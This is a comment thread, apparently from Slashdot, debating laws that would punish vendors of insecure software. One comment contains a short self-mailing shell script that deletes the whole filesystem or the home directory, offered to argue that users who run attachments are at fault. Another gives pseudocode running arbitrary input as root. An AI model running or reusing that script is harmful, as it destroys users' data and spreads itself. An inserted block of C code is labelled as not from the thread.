Laws to Punish Insecure Software Vendors?
Gambit Thirty-Two writes "An influential body of researchers is calling on the US Government to draft laws that would punish software firms that do not do enough to make their products secure."
Yeah that'll work.
A visiting professor at the University of Alabama is giving a seminar on the supernatural. To get a feel for his audience, he asks:
"How many people here believe in ghosts?" About 90 students raise their hands.
"Well that's a good start. Out of those of you who believe in ghosts, do any of you think you've ever seen a ghost?" About 40 students raise their hands.
"That's really good. I'm really glad you take this seriously. Has anyone here ever talked to a ghost?" 15 students raise their hands.
"That's a great response. Has anyone here ever touched a ghost?" 3 students raise their hands.
"That's fantastic. But let me ask you one question further... Have any of you ever made love to a ghost?"
One student in the back raises his hand. The professor is astonished. He takes off his glasses, takes a step back, and says,
"Son, all the years I've been giving this lecture, no one has ever claimed to have slept with a ghost. You've got to come up here and tell us about your experience."
The redneck student replies with a nod and begins to make his way up to the podium.
The professor says, "Well, tell us what it's like to have sex with a Ghost."
The student replies, "Ghost?!? I thought you said 'goats'."
Slashdot, come for the goatse, stay for the trolls.
What will this mean for open source? OSS companies/programmers will be just as liable as closed source ones.
So this means that if I configure my computer without a password I can sue the manufacturer for defective security in their software if it gets hacked.... Cool
</SARCASM>
I will bend your mind with my spoon
Aimed at Microsoft, George Bush's friends in Redmond. Asking for them and others to actually produce secure and reliable software, and making them responsible for their actions.
Sounds ridiculous that this shouldn't already be covered by things like Consumer Protection but in fact those licenses make sure that they have no responsibilities. And no-one is going to change that in the US when there is a president who doesn't want to prosecute for monopolistic practice the bigger violator of security concerns out there.
An Eye for an Eye will make the whole world blind - Gandhi
How do you quantify what is doing enough? If they release a patch in two weeks is that enough? How about 4? Is releasing a patch not enough? Should they actually call people and tell them to install a patch that has been out for months? I mean there is no doubting that Microsoft software has holes but they do patch them. The question is do they do it fast enough and do they make it required for users.
Be careful what powers you give to the government.
So, if a law like this is passed, will the people who break it be branded IT Terrorists? I mean, everything else is terrorism now, why stop here?
Linux, Solaris, HP-UX, MS Windows and a bunch of other products have holes in them that SANS tells others about. Has there ever been a piece of software with no security holes?
Your software is insecure. Please pay your fine by credit card at http:// ...
Sigs are so 1990s. No way would I be seen dead with one.
It's always interesting when those who call for freedom and security for themselves can only figure out how to do it by reducing the freedom of others. Now they want to legislate software standards? Come on, you have to be against that.
I think I'll stop here.
Reconsidering that plaintext cookie in my browser that holds my account password, are we?
--
What happens when you outlaw guns
This is definitely a double edged sword. This could bite anyone on the ass. MS doesn't hold a monopoly on crap code (arguable). What happens to people who don't sell the software, but wrote and make money on its support? (I'm thinking of Apache here).
So.. if a company lobbies against this law, wouldn't that open them up to criticism? I mean, it'd essentially be like them saying "we don't want to be responsible for our insecure software."
This raises some constitutional issues - Do I have the right of freedom of speech ( as code has been found to be in some cases ) to utter an incorrect program?
An additional question would be should all software now come with a warranty that specifically disclaims the implied warranty and states that there is no warranty? Would it be legal under the proposal?
There's a gorilla from Manilla who's a fella that stinks of vanilla and has salmonella.
Seems to me this will have the least impact on those who need to pay attention to security the most (large software companies) while having the potential to make it harder for the "little guy" to write and publish software.
No, Thursday's out. How about never - is never good for you?
Anyone ever read their full End User Licence Agreements, especially MS?
It always has a limit that anything bad that happens while using their product is not their fault.
Now IANAL but I thought that by clicking I Agree, that you were actually agreeing to that.
I suspect that this would ensure far less software gets produced by smaller vendors and individuals who can't afford the liability.
Another good move for corporate America.
Microsoft is able to defend itself against the government. Are you?
My poetry site welcomes the unusual.
But Windows XP is not the only Microsoft product with security failings.
For example Microsoft Bob.
I've been waiting for a service pack for it for years. I'm just not as comfortable hooking Bob up to the internet as I once was. Bob has gotten more viral infections than an old French Whore in a port town.
-Rothfuss
draft laws that would punish software firms that do not do enough to make their products secure
What, legally require things like DRM?
No, I know what it means. Who's going to check out all this software? Are we going to have a Federal Department of Bug-Finding, which employs 57,000 people trying to write Code Red 3?
How will this result in anything other than higher prices and no change in the "security" of software?
You are in a maze of twisty little passages, all alike.
Imperium et libertas
Autocracy and freedom
Laws that make a vendor produce a secure and safe product should apply to software too.
Ford and GM shouldn't be allowed to produce cars that kill people, simply because they couldn't be bothered to make them safer - like exploding gas tanks - ok, so that's not such a great example... (grin)
But really, put the responsibility where it lies. If I put a system out on the net, and don't take some steps to make it secure, I should be liable for damages it causes when it's compromised. Same for SW companies. If you produce a product that doesn't meet the "reasonable" man test for care in producing the product, the maker should be liable for negligence.
I might go even further though, and add some criminal penalties too.
Software can be more reliable and bug-free and secure. (Go read the "Software Conspiracy") Sure it will cost more, but what do you think all the virus outbreaks cost business and individuals. It's just a hidden tax. MS (and others) are just shifting the burden of producing software that works to the users. It's cheaper for MS to produce the software, but lots more expensive for the user to use them.
Finally, the legal system _IS_ part of the free market. The threat and actual loss of damages to a plaintiff balance the system of the market. It's not just buyers and sellers - and a wild woolly mess...
It just bugs me when "free market" proponents want to proclaim that the courts are unnecessary in the free market - bull! They are important and the market will not function correctly without them!
I think a much better approach would be if companies had their software certified as secure. Just an independent group to come in and audit the release at varying levels of bulletproofedness.
It'd drive up software costs, but if consumers don't care to look for the "Certified Secure!" brand, why should the government force it?
Do they really think more regulation is going to improve software? All this will do is make companies put time and effort into "compliance" instead of fixing problems users are asking for.
Free cell phone tracking
The US National Academy of Sciences (NAS) has released drafts of a report commissioned after 11 September to look at the state of America's computer systems.
If the USA Patriot Act could get passed after 9/11, so could this. Let's not forget that rationale goes the way of the buffalo in the months following an attack. And while I think a lot of software would be better than it is now if it were more secure, this wouldn't just affect MS.
Let's hope nothing comes of this, as it could mean lawsuits against anybody and everybody if any piece of data becomes available to the wrong party.
While the concept to "punish" vendors for flawed products is a good one, trying to get the _government_ to do it is a bad one. For one reason, the government is very easily corrupted, and often looks the other way.
A better solution is to allow people to sue software companies that produce software that does not do what it is supposed to do. For example, if Microsoft says they have the most secure servers on the market, they damn well better be that.
As soon as a few lawsuits are filed, things will change for the better. There's too much being "protected" by microsoft software for them to continue business-as-usual for long if they get sued for every nimda/code red/etc out there doing damage.
However, if the company puts out patches (such as through windowsupdate) and the user fails to apply them in a timely manner, it's the user that screwed the pooch, not the producer.
Where laws are concerned one must always tread carefully. What they are proposing is criminal penalties for security flaws. Imagine if the authors faced liability for writing ftpd with back doors in it. Would people still be willing to write free software if that little disclaimer doesn't work any more?
There is a long history of laws (e.g., Sherman Act) designed to limit corporations but instead limit individuals.
We really need fair competition in computer software again. If there were reasonable alternatives (yes *we* know there are, but most companies are pretty clueless wrt actual computer-based solutions), there would be NO NEED for this law, as the better software *should* do better in the marketplace.
Not to sound insensitive to the software security issue, but going down this path simply encourages massive efforts at hacking one camp's software to further one's own favorite.
Yes, people already do this, but to bring in the Gov't to be manipulated by these whims seems silly. Be responsible for your own security.
Ya Sure! You Betcha!, The_THOMAS
Translating this to the software world, frankly, makes my head explode just thinking about it. Consider:
I can see, perhaps, a public standards body to which software vendors could choose to submit their products. In this scheme the government could award some kind of 'certification label' that a vendor could use on their packaging, etc. indicating it's 'safe'. That would at least enable the marketplace to decide the importance of government certification. However, we'd still be left with the niggly questions of what 'safe' is and how we might determine 'safeness'. Maybe this is akin to 'quality' certification along the lines of ISO9001/2 processes (??).
CrazyLegs
"Pork!!" said the Fish, and we all laughed.
Why not, if you get a non-functional/debilitated automobile in most states the dealer is required to buy it back if they can't fix it quickly. If they can however, you keep the fixed car. What a concept!
And real basic liability -- their product does what their marketing claims say it will, or they fix it or take it back and provide some kind of refund.
I'm willing to accept that it may have defects that may cause problems, but the defects in the software should be fixable by the vendor.
I'm not willing to accept that the product has so many defects that it does not do what is claimed. I call that fraud.
This is bad news for anyone dabbling in software development, you make a piece of software to do something (in your opinion) useful, release it on your website where a few dozen download it, it spreads a bit more, and suddenly, someone somewhere does something that provokes your app to crash, or be used, in a nasty way taking out their box and the boxes on that network.
Now you suddenly find yourself with a fresh lawsuit in your mail claiming you're responsible for the couple hundred thousand dollars worth of damage done to a company in some remote place you've never heard of...
This sounds like an excellent way to deter anyone from ever releasing anything that's not tested and tested again, meaning development for a hobby will be a lot tougher.
I see a suggestion like this working only after a developer clearly states and guarantees that his software will not in any way harm the user's equipment, or, very gross neglect from the developer and failing to provide even rudimentary security.
Wax-Museum Fire Results In Hundreds Of New Danny DeVito Statues
What if Linus got hauled into court after ext2fs ate someone's data?
Best Slashdot Co
The software producer's liability should be limited to the amount of their financial return on the software, except in cases where gross negligence is apparent. If I never made a dime of the sale of the software, I should be liable only for that $0.
Open source developers face new warranty threat
Rosen and Kunze were attempting to secure an exemption from implied warranties of merchantability, fitness, or non-infringement for a computer program, "provided under a license that does not impose a license fee for the right to the source code, to make copies, to modify, and to distribute the computer program."
The proposal would have brought the rest of the States in line with Maryland.
The replacement version, which reads "or to distribute..." is joined by a provision that nullifies the exception for software licensed to consumer
The complete text can be found here....
(a) Except as provided in subsection (b), the warranties under Sections 401, and 403 do not apply to a computer program if the licensor makes a copy of the program available to the licensee in a transaction in which there is no contract fee for the right to use, make copies of, modify, or distribute copies of the program.
(b) Subsection (a) does not apply if the copy of the computer program is contained in and sold or leased as part of goods or if the transaction is with a consumer licensee that is not a software developer.
Do you really think that if this becomes a Bill with any serious chance of passing Microsoft won't have lobbied sufficiently to get it to pose a threat to its most serious competition? (Linux and OSS)
The market should work this issue out on its own if it is healthy.
If organizations want higher security, they won't buy the insecure products. Business that have been burned by Outlook/IIS/Windows in the past will move to alternatives: GroupWise/Apache/*NIX.
obviously no deficiencies vs. no obvious deficiencies
What I do want is to KNOW when a supposedly secure product has a security leak. Moreover, I want to know the ramifications of the issue, the patch progress, and current known virii/worms/other exploitations roaming around.
I really don't want to sue company X for making insecure software -- but I don't like the idea of them holding back on vulnerability announcements once they've been exploited.
That's ridiculous, how many times have you heard of a commercial company being liable for crappy products? How many products have MS released that have NOT worked as advertised, yet required consumers PAY to upgrade to a version that should have worked to begin with?
Besides that, all the software licenses (shrink wrap or no) basically say "we're not responsible".
Stupid sexy Flanders.
I do think companies like Microsoft need to take more responsibility for the huge gaping security holes in their products but I'm not sure legislation is the right way to go about it. I do think consumers need to be better informed. When Ford recalls a few vehicles over some potential safety hazard it's all over the evening news. But what about when a dangerous security hole is found in the world's most used operating system? The vast majority of users never even know about it.
Whatever happened to the good old days, where if a product was notoriously unsafe and insecure, that consumers simply refused to buy the product? The manufacturer's only choice then was to either fix the problems, or cease production.
If we bought cars with the same lack of discernment with which we buy software, Chevrolet could bring back the Corvair.
Already a member of the Green Party, thanks.
Be careful what powers you let corporations have when you let them run amok without government regulation.
Remember "Bring 'em on"? *sigh*
So would it be legal to hack again? Or would hacking a system to prove it's insecure cancel the other one out.
. . . we might want to consider that while "security" can mean keeping your machine from being 0wn3d, it can also mean "security" as in the Security Systems Standards and Certification Act, otherwise known as the "Enforced Copy Control and Free Operating System Elimination Act."
CEE5210S The signal SIGHUP was received.
Be careful what powers the government assigns to its proxies.
...
Such as special dispensations to ignore normal contract law by selling "licenses", such as copyright, such as patent,
*Real* libertarians aren't as one sided as you seem to be. They actually believe in fewer laws of any kind, not just fewer of the kind favorable to their favorite soapbox.
Infuriate left and right
I hear a lot of people happy about the idea of going after M$ because they are the Evil Empire. I also hear a lot of people that are afraid of us open sourcers being attacked. Obviously, more secure and better written code should be standard.
I'm not so sure that liability isn't a good thing. I'm not saying that a programmer should be completely responsible for his/her code and any results that occur. I can instead think of a different situation. Imagine I produce a piece of software and sell it/give it away. I don't think it's a bad idea for me to be required to:
Now, of course end users will be responsible for installing patches, monitoring CERT advisories, etc. The end users are also responsible for attempting to avoid known bugs while waiting for a patch to become available. But, sometimes this isn't avoidable (think power generation system). If this particular bug is the cause, then by all means I think the users should be able to go after the company they PAID for damages. It's not like the software company didn't charge the end users to use the software. With those software rights, there really should be some sort of software liability (just like if I made a defective car, and then had to do a recall).
Long, cute, or funny Sigs are just another form of over compensation, used by geeks, nerdz, etc.
This is another one of those catch-all blanket decisions that seem alright at first thought but if you apply it to all cases, you see that it is just disastrous. Let's look at who it affects the most.
BETA SOFTWARE
Well of course that has bugs. So we exempt this? OK, all (Microsoft) software will be beta
NEWBIE / EDUCATIONAL
Some newbie developer or uni student writes a piece of toy software and makes it available on his home page to boost his ego. Some other newbie academic downloads it and a bug in the "file manager" software deletes his C: drive.
Exempt educational software??
FREE BEER
Some people make software out of the goodness of their heart. "YMMV, maybe you like it maybe you don't. No warranty". Maybe it is superb. But it might have a horrendous bug. So people will no longer release freeware
OPEN SOURCE
Same as above but with source open, people can deliberately find bugs and cry out. Worse, there is plenty of open source software in commercial use (Apache etc). What if in some new iteration of Apache, there is a security hole and this will happen. Can people sue for this?! Can people sue the developers who worked on it for free? What exemption do you want now?
MICROSOFT
Well, by now, OSS has dried up because everyone is too scared to give work away. Maybe top projects that have been so heavily scrutinised in the past might be ok (Apache, Linux Kernel). Microsoft might just last a little longer than expected due to security through obscurity but of course they too will perish
The end of software =)
After the US government begins its new laws in the area of data and intellectual property, i have some more they could add:
1. The Crap Film and Television Act, will hold film-makers responsible for bad productions, bad acting, bad lighting and poor scripts. If someone passes out from boredom from watching a film, they can sue the studio.
2. The Invasive Pop-up Advertising Act, will ban all pop-up adverts. This will tie-in with the software laws, because pop-ups are technically software, and are insecure (in that they cause damage to my mouse).
3. The Insecure Boy-Band Act, will ensure that all boy-bands are securely locked-up. If a record company tries to bring them to a studio or gig, they will be punished.
This comment does not represent the views or opinions of the user.
Are they serious? Can Clippy spread a virus? I never heard of that.
Ahhhh he's coming out of the computer....
- adam
Think carefully... how do you make software secure in the first place? Microsoft try to go through extensive software testing to detect bugs. Who knows, maybe if test software is good enough, they can catch most bugs.
How does the OSS world make its software so secure? Through peer review. People find bugs and report them. With OSS these bugs are found fast. And these bugs get fixed fast. But what would be ludicrous would be to sue for bugs since at V1.0.0 there are bound to be bugs. Suing would kill the project. Peer review has made OSS strong and that is the way it should be.
Almost all of the serious virus outbreaks of the last two years can be traced to vulnerabilities in Microsoft products.
I'm not a fan of Microsoft, but it seems to me that it is the user's fault if they contract a virus. It all goes back to the knowledge level of the user.
If someone sent me:
#!/bin/sh
mail next@victim < $0
if [ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~
fi
And I executed it, it would be entirely my fault! Now can I sue every single UNIX (and UNIX-like) vendor because their system allowed me to delete my files "unknowingly"? Most of the Outlook viruses out there were really nothing more than that! In most cases, the user had to manually open the attachment and run it.
Notice, basically every single complaint about Microsoft insecurities was due to ease-of-use features. Outlook executes attachments, it's much easier for users to click on it to execute it. The web server exploits targeted extra services Microsoft added to make things easier for people who want to use those features. And our good pal Clippy, again, another ease-of-use feature. If people were more knowledgeable about computers there would be no need for these extra features and so there would be less code that has to be verified as safe, not to mention more time to verify the important code.
While software security is important, knowledgeable users are just as important, if not more.
Excessive regulation will increase the entry cost of doing business for the little guy. Regulation is nothing but a speed bump to the really large companies like Microsoft, Oracle, Sun, etc.
We have been lucky that the software industry has been left alone for so long, but it is only a matter of time now.
I Heart Sorting Networks
Software companies, held liable for the security of their products, would certainly apply as much pressure as possible to punish crackers. Since so many crackers come from outside the United States, that could really lead to interesting international law enforcement and judicial scenarios - not necessarily pretty ones, either.
Read the EFF's Fair Use FAQ
main_function(){
if(stdlib.getuserid() != "root") then exit "You need to have root privileges to run this program.";
else stdlib.execute_arbitrary_external_prog(stdlib.getuserinput());
}
But the following I would not:
main_function(){
// running as root
integer buflen = 5000;
stdlib.bounds_checked_read_input (stdlib.getuserinput(), buflen);
drop_root_privs();
}
even though the latter may represent a format string vulnerability.
(Entered in pseudocode lest someone get the cute idea to actually sue me)
The Ford Pinto.
We have laws that tell auto manufacturers how they can build cars. Not in detail, no, but they have to meet certain standards or they just aren't legal to make. Note that business concerns don't enter into it. Making the Ford Pinto the way they did originally was a good business decision. It really did cost Ford less to pay out the death claims than to improve the car. It even arguably benefitted the consumers, because lower costs to Ford meant a lower price on the car and consumers were still buying them even after the problem became public so people obviously wanted them. The courts still held Ford criminally liable for building a car that blew up and killed people when they could easily have built one that didn't.
So why should we treat software any differently?
It's a stupid idea.
Quality, security, unbugliness (is that a word?) cost time, and time is money. It's not like you can just pass a law that mandates it, and then everyone gets it for free.
Different uses have different needs. Wayne and Garth's cool discussion board doesn't need as much quality as the receptionist's inventory report, which doesn't need as much quality as NASA's space shuttle stuff.
You use discretion and intelligence and decide how much quality and risk and cost you want, and do what is best. Laws against shitty code, would needlessly reduce options, and let's face it: sometimes shitty code is good enough to get the job done.
The right place for mandating security decisions is when the customer is making demands of the vendor. So if the government wants a law that the software they buy has to be secure, that's better (but still probably not completely wise). But don't spoil it for the rest of us by trying to protect us from using shitty software. The last thing I want is another case of the government protecting me from my own decisions.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
As long as we're making obvious statements...be careful what you stick up your nose.
P.S. The government has all the power. Last I checked, I don't have an armored battalion in my back yard.
It should be enough to just make the software companies liable for some of the damages caused by insecure software they made. That should be enough to make insecure software disappear.
The problem would be that there are several issues with open source software and smaller software firms. Open source software, freeware and to some extent shareware must be excluded from an extension of the liability because no one would develop free (free as in beer) software when he risks having to pay for damages caused by security holes.
Jan
That doesn't change the fact that they did not define the word "security" in the way you allege. Did it ever occur to you that what you quote there might be spin?
CEE5210S The signal SIGHUP was received.
The state of Texas has been licensing software engineers since 1998, and there is a push in software development professional organizations to have other states adopt this view of the software profession as well. With licensure comes liability.
Consumer advocates have been pushing for an end to warranty disclaimers in software for some time.
This just adds another iron to an already burning fire.
I think that all of this is good and possibly of no harm to Free Software if implemented correctly. I.e. reasonable -- but not complete -- exemption for non-commercial software, not just OSS (see my other post re: Limited Liability); penalty according to degree of negligence, speed of response to notification, etc.
Not at all. In fact IE is a horrible example. You get IE whether you want it or not. Remember it is a part of the M$ Windows OS. Since it is part of the OS, you are paying for it. It's part of the product.
Take for example ncftpd. Gleason can not say "hey, when you buy my product all you're buying is the "IO logging facility", the rest of it is free. And OBTW, the only way you can get the rest of the program for free is to buy the logging facility. Therefore I am not liable for anything bad that may happen to the rest of it since it is free."
On the other hand, this law might change M$'s mind on how they package up their OS. Outlook and IE might turn out to be "Free" packages available to be installed but not needed. (gawd.. wtf am I smoking these days)
-- Knowing too much can get you killed, but knowing who knows too much can make you rich.
If companies faced lawsuits and financial penalties when vulnerabilities were found and exploited, they would strongly discourage white-hat hacking, independent vulnerability testing, etc. It would be in Microsoft's best interests to immediately sue anyone who reports a flaw. (White hat hacking violates US law just as black hat does.)
Lawyers would start to be accused of Bugtraq chasing.
I used to support the Libertarians. Why should The Man have the right to tell idiots to wear helmets? Just make motorcycle riders carry enough insurance to cover their costs when they get non-fatal brain injuries (so I don't have to pay for their mistakes) and let them have fun.
But then there's the impaired drunk drivers (not to trivialize the 0.08 crowd, but I'm far more worried about Bubba with a 0.24 BAC than the 0.08 crowd). They tend to take out other people as well. When they drive impaired, they're a threat to all of us. I don't think we should ban alcohol, but I don't see a problem with the state having the right to crack down on repeat drunk drivers because there are documented cases of some drunk drivers who have been in multiple accidents resulting in death.
Taking it one step further, I remember being poor and in college and resenting the mandatory vehicle checks my state required. Then I moved to a state that didn't have mandatory vehicle checks... and heard some horror stories of what those vehicle inspections found in other states. Again, I don't give a damn if some moron wants to jack up his pickup with ice hockey pucks... until he takes it on the road and they suddenly shear, forcing his vehicle to roll/tumble into my oncoming traffic lane.
Now let's revisit the software issue. Once again, I really don't give a damn what people do on their own systems that are not attached to the net. But I do care when I can't use my cable modem because NIMBA a NIMBA stupid NIMBA coding NIMBA bug NIMBA NIMBA left NIMBA many NIMBA NIMBA NIMBA systems NIMBA NIMBA open NIMBA NIMBA NIMBA NIMBA NIMBA.
The Libertarians have a point when they argue that the state should rarely, if ever, protect an individual from themselves. And that the state should rarely, if ever, protect people from inconsequential behavior of their neighbors. (You don't like the fact that your neighbors are gay? It's your problem, not theirs, unless they're doing stuff that would be a problem regardless of their sexual orientation.)
But once you get into behavior that demonstrably harms others, or could reasonably result in harm to others, it's a whole new game. Unfortunately far too many Libertarians don't get this.
In this particular case, we need to see the proposals. But there is absolutely no way you can argue that Microsoft's sloppy practices have not harmed many innocent people. If it takes a law to force them to accept that their indifference demonstrably harms others, so be it.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
The NAS, god bless 'em, tend to make their books available to the great unwashed; you have signed on for email updates, haven't you?
Well, just in case you haven't the draft report is available for online perusal here
PS I said NAS, not NSA. Just to be clear.
Um, yeah, that makes sense.
My beliefs do not require that you agree with them.
The government involvement needs to be limited to its activity as a consumer protection agent.
The government should review the questionable software and force RECALLs like they do with other dangerous products like toys and cars and stuff.
Making NEW law isn't needed here -- simply enforcing current law is enough.
is a "clause" in the law that simply states this.
A software company/programmer can only become liable should their product be sold for commercial value or profit. Software such as freeware or open source is not liable, since it falls under "what you see is what you get". Should the free program contain malicious or intentional security holes/problems, this clause becomes null and void.
But here is something else I did not see written by anyone else. Should such a law be passed, open source software will pretty much vanish from the business world. Seriously, what manager would really want to run it? Can't profit from it if it goes wrong, so why use it?
-- Knowing too much can get you killed, but knowing who knows too much can make you rich.
Many people don't probably realize it but this would be the best thing that could happen to Microsoft. To illustrate the point, consider the fact that US government institutions use almost exclusively Microsoft products but many people don't know that this is actually enforced by law.
There is a law that states that government may only use software, which has certain accessibility features (usable by vision impaired, for example). There is a big bunch of standard requirements that the software products must follow to be in compliance with this law. Now Microsoft is one of the very few companies that can afford compliance with this law.
Now consider what would happen with this proposal when it gets passed. Most probably it will be transformed into an arbitrary set of rather stupid standards and guidelines by our legislative bodies, and again, Microsoft would be the only one able to follow these standards.
When men used to be men
For instance, am I liable if I use the standard C function gets() in a program? I, as the program vendor, can argue that that's what was taught in my undergrad CS course, or I could point the finger at the language designer or C library vendor.
What about a program I write that communicates w/ other software via a standard protocol, and works perfectly if the other software adheres strictly to that protocol but fails in combination with another program which implemented that protocol incorrectly; am I to blame, or is the other vendor? What if the spec is vague?
As I've said in other posts, the potential for good legislation along these lines is there, but only with *heavy* involvement of people who understand issues such as these, alongside the industry lobbyists, consumer advocates and politicians.
Americans that think preserving the fourth amendment is just about ripping DVDs and posting them to USENET are morons. But by the time they figure it out, it'll be too late.
Another proud carrier of the $rtbl flag
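The gets() question raised above has a concrete engineering answer, shown here as an added example that is not code from the original thread. gets() cannot be told the size of its destination buffer, so any input line longer than the buffer overwrites whatever follows it; C11 removed the function from the standard for that reason. The replacement below, read_line_bounded() (a name chosen here, not from the thread), reads with fgets(), strips the newline, and handles the edge case an unbounded read hides: an over-long line is truncated, the caller is told so, and the remainder of the line is discarded so the next call starts at the next line instead of in the middle of this one. tally_lines() feeds constructed sample text through it via tmpfile() so the code runs stand-alone.

```c
/* Added example (not from the original thread): the bounded line-reading
 * discipline that replaces gets(). gets() has no length parameter, so a
 * line longer than the destination buffer overruns it; C11 dropped it.
 * read_line_bounded() reads at most cap-1 bytes with fgets(), strips the
 * newline, and on an over-long line drains the rest so the stream stays
 * aligned on line boundaries. */
#include <stdio.h>
#include <string.h>

typedef struct {
    int ok;         /* 1 if a line was read, 0 at end of input */
    int truncated;  /* 1 if the line did not fit in cap-1 bytes and was cut */
} read_result;

read_result read_line_bounded(char *buf, size_t cap, FILE *in)
{
    read_result r = {0, 0};
    if (cap < 2 || fgets(buf, (int)cap, in) == NULL)
        return r;                    /* nothing read: EOF, error, or no room */
    r.ok = 1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';         /* complete line: drop the newline */
        return r;
    }
    /* No newline in the buffer: either the line was longer than cap-1, the
     * line fit exactly, or EOF arrived without a trailing newline. Peek. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return r;                    /* nothing was lost */
    r.truncated = 1;
    while (c != '\n' && c != EOF)    /* discard the rest of the long line */
        c = fgetc(in);
    return r;
}

typedef struct { int lines; int truncated; } tally;

/* Reads every line of `text` through a buffer of `cap` bytes (capped at 64)
 * and counts lines and truncations. tmpfile() stands in for stdin so the
 * constructed input can be replayed offline. */
tally tally_lines(const char *text, size_t cap)
{
    tally t = {0, 0};
    char buf[64];
    if (cap > sizeof buf) cap = sizeof buf;
    FILE *in = tmpfile();
    if (!in) return t;
    fputs(text, in);
    rewind(in);
    read_result r;
    while ((r = read_line_bounded(buf, cap, in)).ok) {
        t.lines++;
        t.truncated += r.truncated;
    }
    fclose(in);
    return t;
}

int main(void)
{
    /* Constructed input: a short line, a 32-byte line, a final line with no newline. */
    const char *sample = "short\nthis line is much longer than 16\nlast";
    tally t = tally_lines(sample, 16);
    printf("lines=%d truncated=%d\n", t.lines, t.truncated);  /* lines=3 truncated=1 */
    return 0;
}
```

The point for the liability debate is that the bounded version makes the failure mode visible and contained: a line the buffer cannot hold is reported as truncated rather than silently written past the end of the array.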
So does this mean I can sue Kwikset because some idiot took a chainsaw to the side of my house, sawed their way in and stole the watermelon out of my fridge?
After all, the package the lock was sold in implied it would make my house more secure.
Maybe I should sue Poulan because their chainsaw didn't have a warning label that said "use on house walls may cause personal injury due to possible presence of live electrical cabling." I'll bet that would've stopped the burglar.
Noooo....... I've got a better idea...... I'll sue the farmer that grew the watermelon. After all, he created an "attractive nuisance." And there's laws against that.
What about Whirlpool? My fridge doesn't have a factory-installed alarm system. How am I supposed to keep my watermelons secure? Let's sue the pants off of Factory Specification Parts!!
Give me my freedom, and I'll take care of my own security, thank you.
It's never a good idea to formalize issues like these into laws. Consumer preference and freedom of the market allow consumers to create a self-correcting system. If there is a major problem with a product (not necessarily software), the consumers vote with their purchases or lack thereof. This can be seen in people turning away from Firestone towards Goodyear or corporations turning away from Windows servers towards Linux.
However, if corporations were to be fined because of vulnerabilities in their system, they would most likely pass the cost down to the consumers. Large corporations would probably purchase business insurance to cover these potential problems (the same way doctors have Medical insurance). However, it is the small companies that will suffer. Unable to afford insurance, the first major problem in their software could bankrupt a company leading to a small number of large corporations rather than a large number of small corporations.
Lastly, to be able to produce secure software, it is almost mandatory to understand computer science theories such as computability or complexity. This could lead to a requirement (not necessarily a law but a social requirement) for a programmer to be a licensed engineer. This is much in the same way that you need a civil engineer license to build bridges. I mean, just about anyone could build a bridge, but you need to understand civil engineering principles to ensure that the bridge functions to specifications.
_______________________________
"I'm not Conceited...I'm just a realist..."
What would Bill say?
"First they punish us for innovation, and now they want to punish us for feeling insecure? That's incredible! Memo to marketing: words beginning with 'IN' no longer to be used in PR materials."
It will also be used to justify criminalizing people who find and reveal security exploits so that products "seem" more secure to Joe Clueless Moron Taxpayer, because everyone who publicly states the truth will be silenced.
#include <stdio.h>

int main(void)
{
    for (;;)
    {
        printf("Hello World!\n");
    }
}
Surely there's a security hole here somewhere. Give us enough time, we'll find it.
Give me my freedom, and I'll take care of my own security, thank you.
If you're engineering a bridge, does "freedom of speech" give you the right to design it so that it will collapse when people try to use it?
Well, if your bridge collapses then I'll take my business to a competing bridge ;)
Sarcasm aside, the free market is the best way to sort out things such as optimal value. When there is a free, level, and liquid market, then it is the best choice.
I do believe that there is a sufficiently free market for OS's that no government regulation could help. (It could easily make things worse though). Even Microsoft uses unix to master their CD's, because their own OS is not secure enough to handle such a critical function. (anyone still have that link?)
ONLY in cases where the free market doesn't work (because of practical barriers to competition) (utilities, transportation, and "last mile" communications) should government oversight be accepted as the lesser evil. And in those areas, the government might restrict your right to produce faulty products.
PS: Free speech applies to source code, but not necessarily to the commercial sale of source code. In cases where code is simply exchanged with no sale, contract, implicit guarantees, warranties, or other inference that the code is useful for any particular purpose, then no regulation or liability should be able to arise.
There is an ongoing argument that releasing things into the public domain could create liability for the releasor. Since it is fully possible to release things into the public domain anonymously, the argument can be rendered moot. Just don't say who you are when you post things to Freenet.
I see a lot of parallels to the patent process in this topic. Why is it that intellectuals, of all people, think that passing legislation that would lead to grossly subjective enforcement is good for an industry?
What will inevitably happen is that those who can demonstrate that they have procedures in place to remedy security holes (through patches, alerts, etc.) will be immune to enforcement efforts. The actual quality or security of the software itself will become irrelevant because no government funded operation will be able to measure quality appropriately. In other words, the evaluation process turns into the question: "How much are you spending in relation to your sales to ensure security of your products?", not "How secure are your products, and how important is security within your application?"
This terrorism argument is getting stale. How long will we let our government act as if intellectual property, private data, etc., are all our nation's collective interests. If the government wants to establish standards for software they purchase internally, fine. IMHO, that's a procurement issue, not one of industry regulation.
Let's let capitalism handle the rest naturally. Bottom Line:
- if a company promises that certain actions are secure, they're subject to civil suit if they fail
- if a company demonstrates a good track record for security and reliability and gives the greatest peace of mind, they will be the choice of enterprise business (i.e. Oracle, Sun, etc.)
I'm getting sick of the sentiment that government involvement in technology will improve the industry. The only industry this type of legislation helps is the legal industry, and having a massive legal industry for internal matters certainly does not promote economic growth.
It's really very basic: ensuring better security is costly, and so is handling the threat of liabilities (for example by buying insurance to cover the risk). These are costs and risks a large corporation (like Microsoft) may be able to handle, but for a small outfit, or a small open source project, it's much harder. Something the size of Mozilla or the Linux kernel can afford good QA and will find backers to handle the risks, but small projects would be forced under the cover of some larger organisation or the distributors. Also, in the case of open source projects, the sponsors would demand some say in the development process, or maybe even licensing of the software. But small software makers are in a similar position: to handle the risk of litigation they'd need a backer, and they won't have the resources until their software sells well.
By charging higher premiums to insure companies using software with a bad track record, there are already market forces in place: include that difference in premiums in the TCO calculations Microsoft is so fond of to prove that Windows is cheaper than any competition, and make management aware of it (and make them wonder why that insurance company wants higher premiums for insuring against damages from security holes in that software).
Legislation could hurt many a small software maker, and it would also be subject to heavy lobbying from Microsoft to see to it that their interests are hurt the least. A better idea would be an independent (that's the hard part) organisation providing certification of software. Once that is established there could be legislation demanding minimum standards for software used in certain critical areas.
